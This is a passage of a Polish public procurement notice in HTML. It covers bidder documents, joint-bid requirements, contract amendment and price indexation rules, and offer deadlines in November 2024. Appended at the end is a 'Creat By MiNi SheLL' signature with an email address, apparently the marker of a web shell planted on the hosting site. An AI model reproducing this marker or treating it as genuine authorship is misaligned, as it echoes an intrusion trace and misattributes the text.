uzyskać tych dokumentów -<br/>oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub<br/>ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające<br/>ich należyte wykonywanie powinny być wystawione w okresie ostatnich<br/>3 miesięcy; sporządzony zgodnie z wzorem stanowiącym załącznik nr 8<br/>do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, wykonawca jest zobowiązany złożyć wraz z ofertą oświadczenia<br/>i dokumenty, o których mowa w ppkt 2-5 oraz dodatkowo następujące<br/>oświadczenia i dokumenty:<br/>6) oświadczenie, z którego wynika, które usługi wykonają poszczególni<br/>wykonawcy, określające zakres jaki wykona każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie, sporządzone zgodnie z wzorem stanowiącym<br/>załącznik nr 6 do SWZ – oświadczenie składa pełnomocnik w imieniu<br/>wszystkich wykonawców wspólnie ubiegających się o zamówienie,<br/>7) pełnomocnictwo do reprezentowania wykonawcy wspólnie ubiegającego się<br/>o zamówienie w postępowaniu o udzielenie zamówienia albo reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wynagrodzenie wykonawcy określone w umowie może zostać zmienione<br/>w przypadku zmiany stawki podatku od towarów i usług oraz podatku akcyzowego w czasie trwania umowy. W przypadku zmiany, o której mowa w zdaniu <br/>poprzedzającym, wynagrodzenie wykonawcy ulega zmianie wyłącznie w odniesieniu <br/>do części przedmiotu umowy zrealizowanej po dniu wejścia w życie przepisów <br/>zmieniających stawkę podatku oraz wyłącznie do części przedmiotu umowy, do <br/>której zastosowanie znajdzie zmiana stawki podatku. Wynagrodzenie wykonawcy <br/>może ulec odpowiedniemu zwiększeniu bądź zmniejszeniu, jeżeli w wyniku <br/>zastosowania zmienionych stawek podatków ulega zmianie kwota należnego <br/>podatku.<br/>2. Dopuszcza się możliwość zmiany postanowień umowy w zakresie dotyczącym zmiany podwykonawcy lub zmiany wskazanych lub wprowadzenia nowych części przedmiotu umowy, które wykonawca będzie wykonywał za pomocą podwykonawców, na zasadach określonych w niniejszej umowie.<br/>e Strony będą waloryzowały koszty realizacji Przedmiotu Umowy .<br/>Waloryzacja będzie polegała na podwyższeniu albo obniżeniu ceny za okres 1 miesiąca podanej przez Wykonawcę w<br/>ofercie.<br/>3.W trakcie okresu realizacji Umowy, o którym mowa w § 8 ust. 1, Waloryzacja zostanie dokonana jednorazowo na pierwszy<br/>dzień roboczy po upływie 6 miesięcy od dnia realizacji przedmiotu umowy<br/>4.Waloryzacja zostanie dokonana w oparciu o wartości wskaźnika cen towarów i usług konsumpcyjnych ogółem za II kwartał<br/>ogłoszonego w formie komunikatu Prezesa GUS na podstawie art. 25 ust. 11 ustawy z dnia 17 grudnia 1998 r. o emeryturach i rentach z FUS<br/>5. Waloryzacja nie wymaga zawarcia aneksu do Umowy. Ewentualna Waloryzacja zostanie obliczona przez:<br/>1) Wykonawcę, w przypadku gdy nastąpi wzrost wynagrodzenia Wykonawcy.<br/>O nowej (zwaloryzowanej) cenie za okres 1 miesiąca Wykonawca poinformuje Zamawiającego pisemnie podając jej nową<br/>wysokość uwzględniającą Waloryzację oraz sposób obliczenia;<br/>2) Zamawiającego, w przypadku gdy nastąpi spadek wynagrodzenia Wykonawcy.<br/>O nowej (zwaloryzowanej) cenie za okres 1 miesiąca Zamawiający poinformuje Wykonawcę pisemnie podając jej nową<br/>wysokość uwzględniającą Waloryzację oraz sposób jej obliczenia.<br/>Każda ze stron może wnieść zastrzeżenia w terminie 14 dni od dnia doręczenia nowych, zwaloryzowanych cen.<br/>6. W przypadku, gdy strona której przysługuje uprawnienie określone w ust. 4 nie poinformuje, w terminie 7 dni od dnia<br/>ogłoszenia komunikatu o którym mowa w ust. 4 o nowej, zwaloryzowanej cenie za okres 1 miesiąca drugą stronę umowy<br/>oznacza to, że strona przyjmuje, że nie nastąpiły zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia.<br/>W takim przypadku strona ta nie może domagać się dokonania waloryzacji na późniejszym etapie wykonywania niniejszej umowy.<br/>7. W ramach Waloryzacji nowa kwota za okres 1 miesiąca zostanie ustalona w następujący sposób: Cn = Cp +(Cp x CP)<br/>8. Nowa (zwaloryzowana) cena za za okres 1 miesiąca będzie dotyczyć zapłaty należnej Wykonawcy za wykonany<br/>przedmiot umowy po Dniu Dokonania Waloryzacji.<br/>9. Strony ustalają maksymalną wartość obniżenia albo wzrostu Wartości Przedmiotu Umowy w efekcie zastosowania<br/>Waloryzacji na poziomie nie większym niż 10 %.<br/>10. Wykonawca, który uzyska Waloryzację zobowiązany jest do zmiany wynagrodzenia przysługującego Podwykonawcy, z<br/>którym zawarł umowę, w zakresie odpowiadającym zmianom kosztów dotyczących zobowiązania podwykonawcy, jeżeli<br/>okres obowiązywania umowy przekracza 6 miesięcy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-26 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">e-zamówienia lub epuap</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-26 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-31</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com